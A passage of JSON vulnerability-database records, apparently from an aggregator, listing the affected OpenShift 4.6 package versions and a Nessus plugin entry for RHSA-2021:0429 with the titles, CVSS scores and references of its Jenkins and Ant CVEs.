"packageVersion": "1.0.0-82.rhaos4.6.git086e841.el8", "packageFilename": "runc-debuginfo-1.0.0-82.rhaos4.6.git086e841.el8.s390x.rpm", "operator": "lt", "packageName": "runc-debuginfo"}, {"OS": "RedHat", "OSVersion": "8", "arch": "ppc64le", "packageVersion": "1.0.0-82.rhaos4.6.git086e841.el8", "packageFilename": "runc-1.0.0-82.rhaos4.6.git086e841.el8.ppc64le.rpm", "operator": "lt", "packageName": "runc"}, {"OS": "RedHat", "OSVersion": "8", "arch": "x86_64", "packageVersion": "4.6.0-202102050212.p0.git.94265.716fcf8.el8", "packageFilename": "openshift-hyperkube-4.6.0-202102050212.p0.git.94265.716fcf8.el8.x86_64.rpm", "operator": "lt", "packageName": "openshift-hyperkube"}, {"OS": "RedHat", "OSVersion": "8", "arch": "src", "packageVersion": "2.263.3.1612434510-1.el8", "packageFilename": "jenkins-2.263.3.1612434510-1.el8.src.rpm", "operator": "lt", "packageName": "jenkins"}, {"OS": "RedHat", "OSVersion": "8", "arch": "x86_64", "packageVersion": "1.0.0-82.rhaos4.6.git086e841.el8", "packageFilename": "runc-debuginfo-1.0.0-82.rhaos4.6.git086e841.el8.x86_64.rpm", "operator": "lt", "packageName": "runc-debuginfo"}, {"OS": "RedHat", "OSVersion": "8", "arch": "src", "packageVersion": "4.6.0-202102050644.p0.git.3831.1c61c6b.el8", "packageFilename": "openshift-clients-4.6.0-202102050644.p0.git.3831.1c61c6b.el8.src.rpm", "operator": "lt", "packageName": "openshift-clients"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageVersion": "1.19.1-7.rhaos4.6.git6377f68.el7", "packageFilename": "cri-o-debuginfo-1.19.1-7.rhaos4.6.git6377f68.el7.x86_64.rpm", "operator": "lt", "packageName": "cri-o-debuginfo"}, {"OS": "RedHat", "OSVersion": "8", "arch": "src", "packageVersion": "4.6.1612257979-1.el8", "packageFilename": "jenkins-2-plugins-4.6.1612257979-1.el8.src.rpm", "operator": "lt", "packageName": "jenkins-2-plugins"}, {"OS": "RedHat", "OSVersion": "8", "arch": "noarch", "packageVersion": "4.6.0-202102031810.p0.git.2225.a3ab872.el8", "packageFilename": "openshift-kuryr-common-4.6.0-202102031810.p0.git.2225.a3ab872.el8.noarch.rpm", "operator": "lt", "packageName": "openshift-kuryr-common"}, {"OS": "RedHat", "OSVersion": "8", "arch": "s390x", "packageVersion": "1.0.0-82.rhaos4.6.git086e841.el8", "packageFilename": "runc-1.0.0-82.rhaos4.6.git086e841.el8.s390x.rpm", "operator": "lt", "packageName": "runc"}], "vendorCvss": {}}, "lastseen": "2021-07-28T14:35:19", "differentElements": ["vendorCvss"], "edition": 2}], "viewCount": 57, "enchantments": {"dependencies": {"references": [{"type": "redhat", "idList": ["RHSA-2021:0719", "RHSA-2021:0637", "RHSA-2020:4960", "RHSA-2020:2618", "RHSA-2021:0429", "RHSA-2020:4961"]}, {"type": "nessus", "idList": ["ORACLE_PRIMAVERA_GATEWAY_CPU_JUL_2020.NASL", "OPENSUSE-2020-1022.NASL", "REDHAT-RHSA-2021-0637.NASL", "EULEROS_SA-2020-1794.NASL", "GENTOO_GLSA-202011-18.NASL", "FEDORA_2020-7F07DA3FEF.NASL", "JENKINS_2_276.NASL", "PHOTONOS_PHSA-2020-3_0-0155_APACHE.NASL", "EULEROS_SA-2020-2132.NASL", "FEDORA_2020-92B1D001B3.NASL", "ORACLE_ENTERPRISE_MANAGER_OPS_CENTER_JUL_2020_CPU.NASL", "PHOTONOS_PHSA-2020-2_0-0291_APACHE.NASL", "EULEROS_SA-2020-2327.NASL", "FREEBSD_PKG_6D5F1B0BB86548D5935B3FB6EBB425FC.NASL", "REDHAT-RHSA-2021-0423.NASL", "PHOTONOS_PHSA-2020-3_0-0099_APACHE.NASL", "FEDORA_2020-52741B0A49.NASL", "FEDORA_2020-3CE0F55BC5.NASL", "GENTOO_GLSA-202007-34.NASL", "UBUNTU_USN-4380-1.NASL", "ORACLE_PRIMAVERA_UNIFIER_CPU_JAN_2021.NASL", "REDHAT-RHSA-2021-0429.NASL", "EULEROS_SA-2021-1133.NASL", "ORACLE_PRIMAVERA_GATEWAY_CPU_JAN_2021.NASL", "PHOTONOS_PHSA-2020-1_0-0298_APACHE.NASL", "FEDORA_2020-2640AA4E19.NASL", "PHOTONOS_PHSA-2020-1_0-0335_APACHE.NASL", "EULEROS_SA-2020-1915.NASL", "ORACLE_PRIMAVERA_UNIFIER_CPU_JUL_2020.NASL", "ORACLE_BPM_CPU_OCT_2020.NASL", "JENKINS_2_274.NASL"]}, {"type": "archlinux", "idList": ["ASA-202005-15", "ASA-202012-5", "ASA-202101-41"]}, {"type": "redhatcve", "idList": ["RH:CVE-2021-21604", "RH:CVE-2021-21606", "RH:CVE-2021-21611", "RH:CVE-2021-21609", "RH:CVE-2021-21602", "RH:CVE-2020-11979", "RH:CVE-2021-21605", "RH:CVE-2021-21608", "RH:CVE-2021-21610", "RH:CVE-2021-21603", "RH:CVE-2021-21615", "RH:CVE-2020-1945", "RH:CVE-2021-21607"]}, {"type": "cve", "idList": ["CVE-2021-21602", "CVE-2021-21605", "CVE-2021-21607", "CVE-2021-21609", "CVE-2021-21606", "CVE-2020-1945", "CVE-2021-21611", "CVE-2021-21610", "CVE-2020-11979", "CVE-2021-21604", "CVE-2021-21608", "CVE-2021-21603", "CVE-2021-21615"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2020-1945", "UB:CVE-2020-11979"]}, {"type": "github", "idList": ["GHSA-F62V-XPXF-3V68", "GHSA-4P6W-M9WC-C9C9"]}, {"type": "gentoo", "idList": ["GLSA-202011-18", "GLSA-202007-34"]}, {"type": "fedora", "idList": ["FEDORA:52396606732B", "FEDORA:146FE30DD5E7", "FEDORA:88EAA30905CF", "FEDORA:6869030D3139", "FEDORA:2D51F60C28B2"]}, {"type": "photon", "idList": ["PHSA-2020-2.0-0291", "PHSA-2020-3.0-0099", "PHSA-2020-1.0-0335", "PHSA-2021-4.0-0036", "PHSA-2020-1.0-0298", "PHSA-2020-3.0-0155", "PHSA-2020-2.0-0247"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310877930", "OPENVAS:1361412562310877939", "OPENVAS:1361412562310844454"]}, {"type": "ubuntu", "idList": ["USN-4380-1"]}, {"type": "freebsd", "idList": ["6D5F1B0B-B865-48D5-935B-3FB6EBB425FC"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:1022-1"]}, {"type": "oracle", "idList": ["ORACLE:CPUOCT2020", "ORACLE:CPUJUL2021", "ORACLE:CPUJUL2020", "ORACLE:CPUAPR2021", "ORACLE:CPUJAN2021"]}], "modified": "2021-08-25T20:35:08", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-08-25T20:35:08", "rev": 2}}, "objectVersion": "1.6", "affectedPackage": [{"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageVersion": "4.6.0-202102050644.p0.git.3831.1c61c6b.el7", "packageFilename": "openshift-clients-4.6.0-202102050644.p0.git.3831.1c61c6b.el7.x86_64.rpm", "operator": "lt", "packageName": "openshift-clients"}, {"OS": "RedHat", "OSVersion": "8", "arch": "x86_64", "packageVersion": "4.6.0-202102050644.p0.git.3831.1c61c6b.el8", "packageFilename": "openshift-clients-redistributable-4.6.0-202102050644.p0.git.3831.1c61c6b.el8.x86_64.rpm", "operator": "lt", "packageName": "openshift-clients-redistributable"}, {"OS": "RedHat", "OSVersion": "8", "arch": "src", "packageVersion": "4.7-1.el8", "packageFilename": "python-rsa-4.7-1.el8.src.rpm", "operator": "lt", "packageName": "python-rsa"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageVersion": "1.19.1-7.rhaos4.6.git6377f68.el7", "packageFilename": "cri-o-1.19.1-7.rhaos4.6.git6377f68.el7.x86_64.rpm", "operator": "lt", "packageName": "cri-o"}, {"OS": "RedHat", "OSVersion": "8", "arch": "s390x", "packageVersion": "4.6.0-202102050644.p0.git.3831.1c61c6b.el8", "packageFilename": "openshift-clients-4.6.0-202102050644.p0.git.3831.1c61c6b.el8.s390x.rpm", "operator": "lt", "packageName": "openshift-clients"}, {"OS": "RedHat", "OSVersion": "8", "arch": "x86_64", "packageVersion": "4.6.0-202102031810.p0.git.15.dcab90a.el8", "packageFilename": "atomic-openshift-service-idler-4.6.0-202102031810.p0.git.15.dcab90a.el8.x86_64.rpm", "operator": "lt", "packageName": "atomic-openshift-service-idler"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageVersion": "4.6.0-202102050644.p0.git.3831.1c61c6b.el7", "packageFilename": "openshift-clients-4.6.0-202102050644.p0.git.3831.1c61c6b.el7.src.rpm", "operator": "lt", "packageName": "openshift-clients"}, {"OS": "RedHat", "OSVersion": "8", "arch": "ppc64le", "packageVersion": "4.6.0-202102031810.p0.git.15.dcab90a.el8", "packageFilename": "atomic-openshift-service-idler-4.6.0-202102031810.p0.git.15.dcab90a.el8.ppc64le.rpm", "operator": "lt", "packageName": "atomic-openshift-service-idler"}, {"OS": "RedHat", "OSVersion": "8", "arch": "s390x", "packageVersion": "1.0.0-82.rhaos4.6.git086e841.el8", "packageFilename": "runc-1.0.0-82.rhaos4.6.git086e841.el8.s390x.rpm", "operator": "lt", "packageName": "runc"}, {"OS": "RedHat", "OSVersion": "8", "arch": "noarch", "packageVersion": "4.7-1.el8", "packageFilename": "python3-rsa-4.7-1.el8.noarch.rpm", "operator": "lt", "packageName": "python3-rsa"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageVersion": "4.6.0-202102050644.p0.git.3831.1c61c6b.el7", "packageFilename": "openshift-clients-redistributable-4.6.0-202102050644.p0.git.3831.1c61c6b.el7.x86_64.rpm", "operator": "lt", "packageName": "openshift-clients-redistributable"}, {"OS": "RedHat", "OSVersion": "8", "arch": "noarch", "packageVersion": "4.6.0-202102031810.p0.git.2225.a3ab872.el8", "packageFilename": "openshift-kuryr-common-4.6.0-202102031810.p0.git.2225.a3ab872.el8.noarch.rpm", "operator": "lt", "packageName": "openshift-kuryr-common"}, {"OS": "RedHat", "OSVersion": "8", "arch": "src", "packageVersion": "4.6.0-202102050212.p0.git.94265.716fcf8.el8", "packageFilename": "openshift-4.6.0-202102050212.p0.git.94265.716fcf8.el8.src.rpm", "operator": "lt", "packageName": "openshift"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageVersion": "4.6.0-202102050212.p0.git.94265.716fcf8.el7", "packageFilename": "openshift-hyperkube-4.6.0-202102050212.p0.git.94265.716fcf8.el7.x86_64.rpm", "operator": "lt", "packageName": "openshift-hyperkube"}, {"OS": "RedHat", "OSVersion": "8", "arch": "s390x", "packageVersion": "1.0.0-82.rhaos4.6.git086e841.el8", "packageFilename": "runc-debuginfo-1.0.0-82.rhaos4.6.git086e841.el8.s390x.rpm", "operator": "lt", "packageName": "runc-debuginfo"}, {"OS": "RedHat", "OSVersion": "8", "arch": "src", "packageVersion": "4.6.0-202102050644.p0.git.3831.1c61c6b.el8", "packageFilename": "openshift-clients-4.6.0-202102050644.p0.git.3831.1c61c6b.el8.src.rpm", "operator": "lt", "packageName": "openshift-clients"}, {"OS": "RedHat", "OSVersion": "8", "arch": "src", "packageVersion": "4.6.0-202102031810.p0.git.2225.a3ab872.el8", "packageFilename": "openshift-kuryr-4.6.0-202102031810.p0.git.2225.a3ab872.el8.src.rpm", "operator": "lt", "packageName": "openshift-kuryr"}, {"OS": "RedHat", "OSVersion": "8", "arch": "ppc64le", "packageVersion": "4.6.0-202102050212.p0.git.94265.716fcf8.el8", "packageFilename": "openshift-hyperkube-4.6.0-202102050212.p0.git.94265.716fcf8.el8.ppc64le.rpm", "operator": "lt", "packageName": "openshift-hyperkube"}, {"OS": "RedHat", "OSVersion": "8", "arch": "s390x", "packageVersion": "4.6.0-202102031810.p0.git.15.dcab90a.el8", "packageFilename": "atomic-openshift-service-idler-4.6.0-202102031810.p0.git.15.dcab90a.el8.s390x.rpm", "operator": "lt", "packageName": "atomic-openshift-service-idler"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageVersion": "1.0.0-82.rhaos4.6.git086e841.el7", "packageFilename": "runc-1.0.0-82.rhaos4.6.git086e841.el7.src.rpm", "operator": "lt", "packageName": "runc"}, {"OS": "RedHat", "OSVersion": "8", "arch": "s390x", "packageVersion": "4.6.0-202102050212.p0.git.94265.716fcf8.el8", "packageFilename": "openshift-hyperkube-4.6.0-202102050212.p0.git.94265.716fcf8.el8.s390x.rpm", "operator": "lt", "packageName": "openshift-hyperkube"}, {"OS": "RedHat", "OSVersion": "8", "arch": "noarch", "packageVersion": "4.6.0-202102031810.p0.git.2225.a3ab872.el8", "packageFilename": "openshift-kuryr-controller-4.6.0-202102031810.p0.git.2225.a3ab872.el8.noarch.rpm", "operator": "lt", "packageName": "openshift-kuryr-controller"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageVersion": "4.6.0-202102050212.p0.git.94265.716fcf8.el7", "packageFilename": "openshift-4.6.0-202102050212.p0.git.94265.716fcf8.el7.src.rpm", "operator": "lt", "packageName": "openshift"}, {"OS": "RedHat", "OSVersion": "8", "arch": "noarch", "packageVersion": "4.6.0-202102031810.p0.git.2225.a3ab872.el8", "packageFilename": "openshift-kuryr-cni-4.6.0-202102031810.p0.git.2225.a3ab872.el8.noarch.rpm", "operator": "lt", "packageName": "openshift-kuryr-cni"}, {"OS": "RedHat", "OSVersion": "8", "arch": "noarch", "packageVersion": "4.6.0-202102031810.p0.git.2225.a3ab872.el8", "packageFilename": "python3-kuryr-kubernetes-4.6.0-202102031810.p0.git.2225.a3ab872.el8.noarch.rpm", "operator": "lt", "packageName": "python3-kuryr-kubernetes"}, {"OS": "RedHat", "OSVersion": "8", "arch": "src", "packageVersion": "4.6.0-202102031810.p0.git.15.dcab90a.el8", "packageFilename": "atomic-openshift-service-idler-4.6.0-202102031810.p0.git.15.dcab90a.el8.src.rpm", "operator": "lt", "packageName": "atomic-openshift-service-idler"}, {"OS": "RedHat", "OSVersion": "7", "arch": "noarch", "packageVersion": "4.6.0-202102031649.p0.git.0.bf90f86.el7", "packageFilename": "openshift-ansible-4.6.0-202102031649.p0.git.0.bf90f86.el7.noarch.rpm", "operator": "lt", "packageName": "openshift-ansible"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageVersion": "1.0.0-82.rhaos4.6.git086e841.el7", "packageFilename": "runc-debuginfo-1.0.0-82.rhaos4.6.git086e841.el7.x86_64.rpm", "operator": "lt", "packageName": "runc-debuginfo"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageVersion": "4.6.0-202102031649.p0.git.0.bf90f86.el7", "packageFilename": "openshift-ansible-4.6.0-202102031649.p0.git.0.bf90f86.el7.src.rpm", "operator": "lt", "packageName": "openshift-ansible"}, {"OS": "RedHat", "OSVersion": "8", "arch": "ppc64le", "packageVersion": "1.0.0-82.rhaos4.6.git086e841.el8", "packageFilename": "runc-debuginfo-1.0.0-82.rhaos4.6.git086e841.el8.ppc64le.rpm", "operator": "lt", "packageName": "runc-debuginfo"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageVersion": "1.19.1-7.rhaos4.6.git6377f68.el7", "packageFilename": "cri-o-debuginfo-1.19.1-7.rhaos4.6.git6377f68.el7.x86_64.rpm", "operator": "lt", "packageName": "cri-o-debuginfo"}, {"OS": "RedHat", "OSVersion": "8", "arch": "ppc64le", "packageVersion": "1.0.0-82.rhaos4.6.git086e841.el8", "packageFilename": "runc-debugsource-1.0.0-82.rhaos4.6.git086e841.el8.ppc64le.rpm", "operator": "lt", "packageName": "runc-debugsource"}, {"OS": "RedHat", "OSVersion": "8", "arch": "noarch", "packageVersion": "4.6.1612257979-1.el8", "packageFilename": "jenkins-2-plugins-4.6.1612257979-1.el8.noarch.rpm", "operator": "lt", "packageName": "jenkins-2-plugins"}, {"OS": "RedHat", "OSVersion": "8", "arch": "ppc64le", "packageVersion": "4.6.0-202102050644.p0.git.3831.1c61c6b.el8", "packageFilename": "openshift-clients-4.6.0-202102050644.p0.git.3831.1c61c6b.el8.ppc64le.rpm", "operator": "lt", "packageName": "openshift-clients"}, {"OS": "RedHat", "OSVersion": "8", "arch": "x86_64", "packageVersion": "1.0.0-82.rhaos4.6.git086e841.el8", "packageFilename": "runc-debugsource-1.0.0-82.rhaos4.6.git086e841.el8.x86_64.rpm", "operator": "lt", "packageName": "runc-debugsource"}, {"OS": "RedHat", "OSVersion": "8", "arch": "x86_64", "packageVersion": "1.0.0-82.rhaos4.6.git086e841.el8", "packageFilename": "runc-1.0.0-82.rhaos4.6.git086e841.el8.x86_64.rpm", "operator": "lt", "packageName": "runc"}, {"OS": "RedHat", "OSVersion": "8", "arch": "x86_64", "packageVersion": "4.6.0-202102050644.p0.git.3831.1c61c6b.el8", "packageFilename": "openshift-clients-4.6.0-202102050644.p0.git.3831.1c61c6b.el8.x86_64.rpm", "operator": "lt", "packageName": "openshift-clients"}, {"OS": "RedHat", "OSVersion": "8", "arch": "src", "packageVersion": "4.6.1612257979-1.el8", "packageFilename": "jenkins-2-plugins-4.6.1612257979-1.el8.src.rpm", "operator": "lt", "packageName": "jenkins-2-plugins"}, {"OS": "RedHat", "OSVersion": "8", "arch": "noarch", "packageVersion": "2.263.3.1612434510-1.el8", "packageFilename": "jenkins-2.263.3.1612434510-1.el8.noarch.rpm", "operator": "lt", "packageName": "jenkins"}, {"OS": "RedHat", "OSVersion": "7", "arch": "noarch", "packageVersion": "4.6.0-202102031649.p0.git.0.bf90f86.el7", "packageFilename": "openshift-ansible-test-4.6.0-202102031649.p0.git.0.bf90f86.el7.noarch.rpm", "operator": "lt", "packageName": "openshift-ansible-test"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageVersion": "1.0.0-82.rhaos4.6.git086e841.el7", "packageFilename": "runc-1.0.0-82.rhaos4.6.git086e841.el7.x86_64.rpm", "operator": "lt", "packageName": "runc"}, {"OS": "RedHat", "OSVersion": "8", "arch": "ppc64le", "packageVersion": "1.0.0-82.rhaos4.6.git086e841.el8", "packageFilename": "runc-1.0.0-82.rhaos4.6.git086e841.el8.ppc64le.rpm", "operator": "lt", "packageName": "runc"}, {"OS": "RedHat", "OSVersion": "8", "arch": "src", "packageVersion": "1.0.0-82.rhaos4.6.git086e841.el8", "packageFilename": "runc-1.0.0-82.rhaos4.6.git086e841.el8.src.rpm", "operator": "lt", "packageName": "runc"}, {"OS": "RedHat", "OSVersion": "8", "arch": "s390x", "packageVersion": "1.0.0-82.rhaos4.6.git086e841.el8", "packageFilename": "runc-debugsource-1.0.0-82.rhaos4.6.git086e841.el8.s390x.rpm", "operator": "lt", "packageName": "runc-debugsource"}, {"OS": "RedHat", "OSVersion": "8", "arch": "x86_64", "packageVersion": "1.0.0-82.rhaos4.6.git086e841.el8", "packageFilename": "runc-debuginfo-1.0.0-82.rhaos4.6.git086e841.el8.x86_64.rpm", "operator": "lt", "packageName": "runc-debuginfo"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageVersion": "1.19.1-7.rhaos4.6.git6377f68.el7", "packageFilename": "cri-o-1.19.1-7.rhaos4.6.git6377f68.el7.src.rpm", "operator": "lt", "packageName": "cri-o"}, {"OS": "RedHat", "OSVersion": "8", "arch": "src", "packageVersion": "2.263.3.1612434510-1.el8", "packageFilename": "jenkins-2.263.3.1612434510-1.el8.src.rpm", "operator": "lt", "packageName": "jenkins"}, {"OS": "RedHat", "OSVersion": "8", "arch": "x86_64", "packageVersion": "4.6.0-202102050212.p0.git.94265.716fcf8.el8", "packageFilename": "openshift-hyperkube-4.6.0-202102050212.p0.git.94265.716fcf8.el8.x86_64.rpm", "operator": "lt", "packageName": "openshift-hyperkube"}], "vendorCvss": {"severity": "important"}, "_object_type": "robots.models.redhat.RedHatBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"]}], "nessus": [{"id": "REDHAT-RHSA-2021-0429.NASL", "hash": "b31948696810c569c40a192d8798474f", "type": "nessus", "bulletinFamily": "scanner", "title": "RHEL 7 : OpenShift Container Platform 4.5.33 packages and (RHSA-2021:0429)", "description": "The remote Redhat Enterprise Linux 7 host has packages installed that are affected by multiple vulnerabilities as referenced in the RHSA-2021:0429 advisory.\n\n - ant: insecure temporary file (CVE-2020-11979)\n\n - ant: insecure temporary file vulnerability (CVE-2020-1945)\n\n - jenkins: Arbitrary file read vulnerability in workspace browsers (CVE-2021-21602)\n\n - jenkins: XSS vulnerability in notification bar (CVE-2021-21603)\n\n - jenkins: Improper handling of REST API XML deserialization errors (CVE-2021-21604)\n\n - jenkins: Path traversal vulnerability in agent names (CVE-2021-21605)\n\n - jenkins: Arbitrary file existence check in file fingerprints (CVE-2021-21606)\n\n - jenkins: Excessive memory allocation in graph URLs leads to denial of service (CVE-2021-21607)\n\n - jenkins: Stored XSS vulnerability in button labels (CVE-2021-21608)\n\n - jenkins: Missing permission check for paths with specific prefix (CVE-2021-21609)\n\n - jenkins: Reflected XSS vulnerability in markup formatter preview (CVE-2021-21610)\n\n - jenkins: Stored XSS vulnerability on new item page (CVE-2021-21611)\n\n - jenkins: Filesystem traversal by privileged users (CVE-2021-21615)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2021-03-03T00:00:00", "modified": "2021-10-07T00:00:00", "cvss": {"score": 6, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 8, "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/147015", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://bugzilla.redhat.com/1925143", "https://access.redhat.com/security/cve/CVE-2021-21611", "https://bugzilla.redhat.com/1925140", "https://cwe.mitre.org/data/definitions/22.html", "https://cwe.mitre.org/data/definitions/59.html", "https://bugzilla.redhat.com/1925145", "https://cwe.mitre.org/data/definitions/863.html", "https://access.redhat.com/errata/RHSA-2021:0429", "https://bugzilla.redhat.com/1925156", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1945", "https://access.redhat.com/security/cve/CVE-2021-21603", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21607", "https://access.redhat.com/security/cve/CVE-2021-21609", "https://access.redhat.com/security/cve/CVE-2021-21604", "https://access.redhat.com/security/cve/CVE-2020-11979", "https://bugzilla.redhat.com/1925157", "https://bugzilla.redhat.com/1925141", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21610", "https://access.redhat.com/security/cve/CVE-2021-21606", "https://access.redhat.com/security/cve/CVE-2021-21608", "https://bugzilla.redhat.com/1837444", "https://bugzilla.redhat.com/1925159", "https://cwe.mitre.org/data/definitions/502.html", "https://cwe.mitre.org/data/definitions/377.html", "https://access.redhat.com/security/cve/CVE-2021-21615", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21609", "https://bugzilla.redhat.com/1925160", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21611", "https://bugzilla.redhat.com/1925151", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21606", "https://access.redhat.com/security/cve/CVE-2020-1945", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21605", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21608", "https://bugzilla.redhat.com/1921322", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11979", "https://cwe.mitre.org/data/definitions/770.html", "https://access.redhat.com/security/cve/CVE-2021-21607", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21603", "https://access.redhat.com/security/cve/CVE-2021-21605", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21615", "https://bugzilla.redhat.com/1925161", "https://access.redhat.com/security/cve/CVE-2021-21602", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21602", "https://cwe.mitre.org/data/definitions/79.html", "https://bugzilla.redhat.com/1903702", "https://access.redhat.com/security/cve/CVE-2021-21610", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21604", "https://cwe.mitre.org/data/definitions/20.html"], "cvelist": ["CVE-2020-1945", "CVE-2020-11979", "CVE-2021-21602", "CVE-2021-21603", "CVE-2021-21604", "CVE-2021-21605", "CVE-2021-21606", "CVE-2021-21607", "CVE-2021-21608", "CVE-2021-21609", "CVE-2021-21610", "CVE-2021-21611", "CVE-2021-21615"], "immutableFields": [], "lastseen": "2021-10-07T23:48:09", "history": [{"bulletin": {"id": "REDHAT-RHSA-2021-0429.NASL", "hash": "a14657dfddefe9515ef7edb1e1d3b61357a9ef914a764d785687439b3ca2be1f", "type": "nessus", "bulletinFamily": "scanner", "title": "RHEL 7 / 8 : OpenShift Container Platform 4.5.33 packages and (RHSA-2021:0429)", "description": "The remote Redhat Enterprise Linux 7 / 8 host has packages installed that are affected by multiple vulnerabilities as\nreferenced in the RHSA-2021:0429 advisory.\n\n - ant: insecure temporary file (CVE-2020-11979)\n\n - ant: insecure temporary file vulnerability (CVE-2020-1945)\n\n - jenkins: Arbitrary file read vulnerability in workspace browsers (CVE-2021-21602)\n\n - jenkins: XSS vulnerability in notification bar (CVE-2021-21603)\n\n - jenkins: Improper handling of REST API XML deserialization errors (CVE-2021-21604)\n\n - jenkins: Path traversal vulnerability in agent names (CVE-2021-21605)\n\n - jenkins: Arbitrary file existence check in file fingerprints (CVE-2021-21606)\n\n - jenkins: Excessive memory allocation in graph URLs leads to denial of service (CVE-2021-21607)\n\n - jenkins: Stored XSS vulnerability in button labels (CVE-2021-21608)\n\n - jenkins: Missing permission check for paths with specific prefix (CVE-2021-21609)\n\n - jenkins: Reflected XSS vulnerability in markup formatter preview (CVE-2021-21610)\n\n - jenkins: Stored XSS vulnerability on new item page (CVE-2021-21611)\n\n - jenkins: Filesystem traversal by privileged users (CVE-2021-21615)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "published": "2021-03-03T00:00:00", "modified": "2021-03-03T00:00:00", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 8.0, "vector": "AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/147015", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://access.redhat.com/security/cve/CVE-2021-21610", "https://cwe.mitre.org/data/definitions/79.html", "https://access.redhat.com/security/cve/CVE-2021-21602", "https://bugzilla.redhat.com/1925143", "https://cwe.mitre.org/data/definitions/863.html", "https://bugzilla.redhat.com/1925156", "https://access.redhat.com/security/cve/CVE-2020-1945", "https://bugzilla.redhat.com/1925145", "https://cwe.mitre.org/data/definitions/770.html", "https://access.redhat.com/security/cve/CVE-2021-21611", "https://cwe.mitre.org/data/definitions/20.html", "https://access.redhat.com/security/cve/CVE-2021-21607", "https://bugzilla.redhat.com/1921322", "https://access.redhat.com/security/cve/CVE-2021-21606", "https://bugzilla.redhat.com/1925159", "https://access.redhat.com/security/cve/CVE-2021-21604", "https://access.redhat.com/security/cve/CVE-2021-21603", "https://bugzilla.redhat.com/1925160", "https://cwe.mitre.org/data/definitions/22.html", "https://access.redhat.com/security/cve/CVE-2020-11979", "https://access.redhat.com/security/cve/CVE-2021-21609", "https://cwe.mitre.org/data/definitions/377.html", "https://bugzilla.redhat.com/1925141", "https://cwe.mitre.org/data/definitions/59.html", "https://access.redhat.com/security/cve/CVE-2021-21615", "https://cwe.mitre.org/data/definitions/502.html", "https://bugzilla.redhat.com/1837444", "https://access.redhat.com/security/cve/CVE-2021-21608", "https://bugzilla.redhat.com/1925161", "https://bugzilla.redhat.com/1925157", "https://bugzilla.redhat.com/1925140", "https://bugzilla.redhat.com/1925151", "https://bugzilla.redhat.com/1903702", "https://access.redhat.com/errata/RHSA-2021:0429", "https://access.redhat.com/security/cve/CVE-2021-21605"], "cvelist": ["CVE-2021-21609", "CVE-2021-21607", "CVE-2021-21608", "CVE-2021-21606", "CVE-2021-21604", "CVE-2020-11979", "CVE-2020-1945", "CVE-2021-21602", "CVE-2021-21615", "CVE-2021-21603", "CVE-2021-21610", "CVE-2021-21611", "CVE-2021-21605"], "immutableFields": [], "lastseen": "2021-03-05T06:17:14", "history": [], "viewCount": 1, "enchantments": {"dependencies": {"modified": "2021-03-05T06:17:14", "references": [{"idList": ["USN-4380-1"], "type": "ubuntu"}, {"idList": ["OPENVAS:1361412562310877939", "OPENVAS:1361412562310844454", "OPENVAS:1361412562310877930"], "type": "openvas"}, {"idList": ["CVE-2021-21609", "CVE-2021-21607", "CVE-2021-21608", "CVE-2021-21604", "CVE-2021-21602", "CVE-2021-21615", "CVE-2021-21603", "CVE-2021-21610", "CVE-2021-21611", "CVE-2021-21605"], "type": "cve"}, {"idList": ["GHSA-F62V-XPXF-3V68", "GHSA-4P6W-M9WC-C9C9"], "type": "github"}, {"idList": ["OPENSUSE-SU-2020:1022-1"], "type": "suse"}, {"idList": ["FEDORA:52396606732B", "FEDORA:6869030D3139", "FEDORA:146FE30DD5E7", "FEDORA:2D51F60C28B2", "FEDORA:88EAA30905CF"], "type": "fedora"}, {"idList": ["6D5F1B0B-B865-48D5-935B-3FB6EBB425FC"], "type": "freebsd"}, {"idList": ["ORACLE:CPUJUL2020", "ORACLE:CPUOCT2020", "ORACLE:CPUJAN2021"], "type": "oracle"}, {"idList": ["ASA-202005-15", 